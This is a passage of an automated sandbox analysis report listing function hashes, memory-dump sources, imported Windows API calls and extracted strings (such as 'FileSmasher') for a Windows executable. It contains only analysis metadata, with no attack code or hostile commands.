                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: %s:%08x$GenuineIntel$GenuineIotel
                                • API String ID: 0-2468691418
                                • Opcode ID: 5e00549dddc417758d175cd5b247fcdac5164947a460c6fc2e8f035a4589b6d0
                                • Instruction ID: ef081f72bb4cdc7e24380d7e12c50f566dd41fe1eeb303efa9d2195161100e9f
                                • Opcode Fuzzy Hash: 5e00549dddc417758d175cd5b247fcdac5164947a460c6fc2e8f035a4589b6d0
                                • Instruction Fuzzy Hash: D7419271D142499FCB11CFB8C8807EEBBB5EF6A310F14816AE815A7341E7388905CB65
                                APIs
                                • FindFirstFileW.KERNEL32(?,00000001,0046E219,?,1D1D1D8C,00000000,?,00000001), ref: 0046C9AF
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: FileFindFirst
                                • String ID: \\?\
                                • API String ID: 1974802433-4282027825
                                • Opcode ID: f493e3ec0c0365d601dda9286fa5ac785f5688808302581b2e02ab17960157f2
                                • Instruction ID: 466355a01e7b825cad4fd529a01952e2af831e9010863f6ae6310193d666d26a
                                • Opcode Fuzzy Hash: f493e3ec0c0365d601dda9286fa5ac785f5688808302581b2e02ab17960157f2
                                • Instruction Fuzzy Hash: 69F09AB56006049F8340CB6DDC85D52B3A8EF8A37532883A9E918DB3A1E635AD00CBA4
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: V
                                • API String ID: 0-433605988
                                • Opcode ID: 76ae3eb703a0602a373f911ac9ad378478f18b5eb0beb1f91b32f166f295b47f
                                • Instruction ID: f8b6643259fef2ad4008a7e23513e40020b8eba216ea984c77515ec0901e6f35
                                • Opcode Fuzzy Hash: 76ae3eb703a0602a373f911ac9ad378478f18b5eb0beb1f91b32f166f295b47f
                                • Instruction Fuzzy Hash: 02E19CB1D056288FEB24CB14CC90BEABBB5EB85311F1441EED84967241DB386EC5CF96
                                APIs
                                • CoCreateInstance.OLE32(004BC810,00000000,00000001,004C1AFC,?), ref: 0044494F
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: CreateInstance
                                • String ID:
                                • API String ID: 542301482-0
                                • Opcode ID: 167c21f9170c61d7dec070417aeb6f320e46ac321cfd58e7a502725eb0feb4d1
                                • Instruction ID: a6a9f9cc77d7f0a07212dedea549499c41f8e574d5345a7dc29d12e512f086a5
                                • Opcode Fuzzy Hash: 167c21f9170c61d7dec070417aeb6f320e46ac321cfd58e7a502725eb0feb4d1
                                • Instruction Fuzzy Hash: DCF054B7300210ABD7219E5B9C80E43BBA9EBDD774720452EF74897301DA769812D6A8
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID: 0-399585960
                                • Opcode ID: 139206d703244f9fdc49eadf388b9c3a653b4028f4d110e69bb6445f7a5dc39b
                                • Instruction ID: 5b645a497636a1de9e600b3b5c69b1be11d8b58e577e9b1f5a9b0be0442f5a63
                                • Opcode Fuzzy Hash: 139206d703244f9fdc49eadf388b9c3a653b4028f4d110e69bb6445f7a5dc39b
                                • Instruction Fuzzy Hash: A49106B1E042649FE7248B10EC847EB77B5FF90314F5042FAD84E96681E7785EC1CA52
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: common
                                • API String ID: 0-3857477713
                                • Opcode ID: 5e3db6c1ffe91f925c0d071068069ee6e45b47405032df368c17bf1e641662f8
                                • Instruction ID: aa216b8fcc850d54d0ab7be48bb563fab11601ef7d8982119b17cbbd1da7f8bb
                                • Opcode Fuzzy Hash: 5e3db6c1ffe91f925c0d071068069ee6e45b47405032df368c17bf1e641662f8
                                • Instruction Fuzzy Hash: 097106B2E041249AEB288B14DD80BFB7775EB95310F1081BBE90E67684D67C5EC1CF5A
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: V
                                • API String ID: 0-433605988
                                • Opcode ID: 5071269b6bab0c1dd79dce42214ce1a512198e3082085af673664af89407d0fc
                                • Instruction ID: 7a46a623c87d46e109ed50a76d6406abedb79d86b8dfed5f3f66fb4403ed09e7
                                • Opcode Fuzzy Hash: 5071269b6bab0c1dd79dce42214ce1a512198e3082085af673664af89407d0fc
                                • Instruction Fuzzy Hash: E761E3B1D046189BE7208B25DC84BFB7775EB84304F1081FEE90D66680EB385EC6CA57
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: V
                                • API String ID: 0-433605988
                                • Opcode ID: 757e9ff5c1567e5dfd3476e236039163917a94c3fc185f2058f417f68cb6e385
                                • Instruction ID: 54797916e3dc882b79422f10399017d7d6943fd4398b5e3f05ddd5512805ceb3
                                • Opcode Fuzzy Hash: 757e9ff5c1567e5dfd3476e236039163917a94c3fc185f2058f417f68cb6e385
                                • Instruction Fuzzy Hash: 9A61E6B1D046289AE7208B25DC84BFB7775EB84315F1081FEE90D66680EB7C4EC6CE56
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: _R
                                • API String ID: 0-1717569336
                                • Opcode ID: 6a899950d644ea6c2f1223bfce1993f84289e9e169b9015a73e9daa37bf58242
                                • Instruction ID: 33cc46f2cd2d5a11e31b00db56349fe57dfa520c6097e1a64061c56b9414d117
                                • Opcode Fuzzy Hash: 6a899950d644ea6c2f1223bfce1993f84289e9e169b9015a73e9daa37bf58242
                                • Instruction Fuzzy Hash: D461DFB19542558AEB649B20DC80BEAB3B5EF94300F1091FAD44D97690EB794FC2CF1A
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 390dfdf4b9ea32333300fc9057e662f8209510aa40f045774bdb22c753d4746b
                                • Instruction ID: 2f5bd20dfdf8811118756d311ad70a8170244ae597dc099000ab618d47d0b37e
                                • Opcode Fuzzy Hash: 390dfdf4b9ea32333300fc9057e662f8209510aa40f045774bdb22c753d4746b
                                • Instruction Fuzzy Hash: 9532F5B7A583194FC70CCE85DC805A5B3E2FBD8304B0E597D9959D7316EBB4EA098AC0
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a96658aefed841e4bd1c4b03aa5248894c2a3c5282d08f0adfd1d647e6ad7330
                                • Instruction ID: 57ecc883dded93a6826be8cd0c8434ba9d8dd7aeb52d8098ae97e57450000a07
                                • Opcode Fuzzy Hash: a96658aefed841e4bd1c4b03aa5248894c2a3c5282d08f0adfd1d647e6ad7330
                                • Instruction Fuzzy Hash: 0812C5BBB983194FDB48CEE5DCC169573E1FB98304F09A43C9A55C7306F6E8AA094790
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Exception@8Throwstd::exception::exception
                                • String ID:
                                • API String ID: 3728558374-0
                                • Opcode ID: 633ee63756c80194708ffb94b0149ee78c3c90c548190b0d43f5b3b72c9c1deb
                                • Instruction ID: 3677c2a4413e502bcac265b81ae0569689aa7f27a1f6e73044c802614a20508c
                                • Opcode Fuzzy Hash: 633ee63756c80194708ffb94b0149ee78c3c90c548190b0d43f5b3b72c9c1deb
                                • Instruction Fuzzy Hash: A8A1A872E002199BCB08DF58C99469EB7B5BF88304F14862EE815AF3C5D7B4AD05CB94
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 09003370ddbeac6d7f79fa62771aaa20b1e3ab036e2d477f646bb6f057d7b023
                                • Instruction ID: f063c57a0dabc482292aec8050cb7aba3f0ac2d34f54dfccecc4f6f3c4bfb5c3
                                • Opcode Fuzzy Hash: 09003370ddbeac6d7f79fa62771aaa20b1e3ab036e2d477f646bb6f057d7b023
                                • Instruction Fuzzy Hash: A781D1B2D041258FE724CB24DD44AEBB775EF84310F1481FBD80DAB680D6399EC68E56
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 48b3ec8c2da1c2ba6ddd785a76651a82fcb7268475b1e6cfec299b236dba2d9b
                                • Instruction ID: 5aa9bfe6c0129411dfd979f7adbfdfd8ca4fb0f5d10ad7d50539a2866b8f6e3a
                                • Opcode Fuzzy Hash: 48b3ec8c2da1c2ba6ddd785a76651a82fcb7268475b1e6cfec299b236dba2d9b
                                • Instruction Fuzzy Hash: F751D471D4416A8ADB208B25DC817FA77B1EF84315F1480FBD81EA6280E6785EC2DF59
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: dbfa4870adc45b631622be3ca2592a958701174f62ce168f61f50a2c33284457
                                • Instruction ID: 48852144169400102215830900a77111febc21c0817d92a7057d820840cf8b63
                                • Opcode Fuzzy Hash: dbfa4870adc45b631622be3ca2592a958701174f62ce168f61f50a2c33284457
                                • Instruction Fuzzy Hash: F45106B2E041249AEB248B24DD84BFA7775EBC5310F1081BBE90E67684D67C5EC1CF5A
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                • Instruction ID: c4f854496fe7d8e591f69f599d75b85a0d4fbbe213d946b15adbcdf1b5ac5b02
                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                • Instruction Fuzzy Hash: 61115BB724005243D614AA3DC8F45BFA395EBC532072C8B7BD8424B748D23AD997972C
                                APIs
                                • GetCurrentThreadId.KERNEL32 ref: 004627BE
                                • EnterCriticalSection.KERNEL32(?), ref: 004627D2
                                • LeaveCriticalSection.KERNEL32(?), ref: 004627EA
                                • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 00462820
                                • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 0046282F
                                • GetSystemMetrics.USER32(0000000C), ref: 00462846
                                • GetSystemMetrics.USER32(0000000B), ref: 0046284B
                                • LoadImageW.USER32(?,00000005,00000001,00000000), ref: 00462853
                                • SendMessageW.USER32(?,00000080,00000001,00000000), ref: 00462868
                                • GetSystemMetrics.USER32(00000032), ref: 0046287B
                                • GetSystemMetrics.USER32(00000031), ref: 00462880
                                • LoadImageW.USER32(?,00000005,00000001,00000000), ref: 0046288C
                                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0046289D
                                • SetWindowTextW.USER32(?,-00000004), ref: 00462915
                                • MulDiv.KERNEL32(00000082,?,00000064), ref: 00462A1A
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: MetricsSystem$CreateCriticalEventImageLoadMessageSectionSend$CurrentEnterLeaveTextThreadWindow
                                • String ID: FileSmasher$FileSmasher\maindlg.xml$IDS_WINDOW_TITLE$tool_header_bg
                                • API String ID: 2178025920-2066410532
                                • Opcode ID: 80b7c20c52323f7a20dcdbe1bc36ffb38e72473d230269f20547debb6dc53802
                                • Instruction ID: f15ceb1fff673dbdcb3d588ef808f44365002a63d70d00c3430f4cc7cbce6478
                                • Opcode Fuzzy Hash: 80b7c20c52323f7a20dcdbe1bc36ffb38e72473d230269f20547debb6dc53802
                                • Instruction Fuzzy Hash: 70B1C371604340AFE710DF64CC85B5A77A8EF84B14F14452EF944AB2D1EBB9E805CB9A
                                APIs
                                • EnterCriticalSection.KERNEL32(004E38E8,CrashReport.dll,-00000010,00000000), ref: 004442A1
                                • RegisterWindowMessageW.USER32(WM_ATLGETHOST,?,?,?,?,?,?,?,?,?,?,?,?,0043E5A6), ref: 004442B2
                                • RegisterWindowMessageW.USER32(WM_ATLGETCONTROL,?,?,?,?,?,?,?,?,?,?,?,?,0043E5A6), ref: 004442BE
                                • GetClassInfoExW.USER32(?,AtlAxWin90,?), ref: 004442DF
                                • LoadCursorW.USER32 ref: 0044431B
                                • RegisterClassExW.USER32 ref: 00444342
                                • _memset.LIBCMT ref: 0044436E
                                • GetClassInfoExW.USER32(?,AtlAxWinLic90,?), ref: 0044438B
                                • LoadCursorW.USER32 ref: 004443CB
                                • RegisterClassExW.USER32 ref: 004443F2
                                • LeaveCriticalSection.KERNEL32(004E38E8,?,?,?,?,?,?,?,?,?), ref: 0044441D
                                • LeaveCriticalSection.KERNEL32(004E38E8), ref: 00444433
                                  • Part of subcall function 004033D0: __recalloc.LIBCMT ref: 004033FC
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
